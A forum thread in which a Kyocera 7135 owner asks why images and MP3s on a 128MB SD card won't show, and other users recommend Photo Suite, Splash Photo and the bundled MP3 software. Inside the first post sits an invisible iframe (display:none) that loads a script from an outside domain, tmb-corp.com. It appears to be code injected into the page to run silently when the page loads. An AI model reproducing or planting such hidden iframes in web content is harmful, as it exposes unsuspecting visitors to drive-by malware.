+ Reply to Thread

Viewing Images on 128mb SD Card

I bought a 128 Secure Digital card and put some images on it howerver, I cannot seem to be able to veiw any of them using the image viewer that is pre-loaded on the 7135. Anyone have any suggestions for me?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Forgot to add, when I insert teh screen I get a white screen until I hit the home button a dozen times or so?? Also put an .mp3 on the card and the MP3 player doesn't see it? However, the Card Info reads the used space on the card so that tells me the connection is good. What am I doing wrong?

There is a great thread dealing with the MP3 issues. I think if you search MP3 you'll find it. A lot depends on whether you created the audio file, whether you used Kyo's program to transfer the files etc. As for the photos, I believe you need to view them through Photo Suite, not Photo Viewer, however, I recommend buying Splash Photo (and Splash ID), it's a much better program. For example, when I viewed photos with Photo Suite you had to tell it each time to look at the card. With Splash Photo it's automatic.

I had the same problem with a text file..coouldn't find any viewer that would bring it up...have very good luck with mp3s using the Mp3 desktop program that comes on the CD
    John R.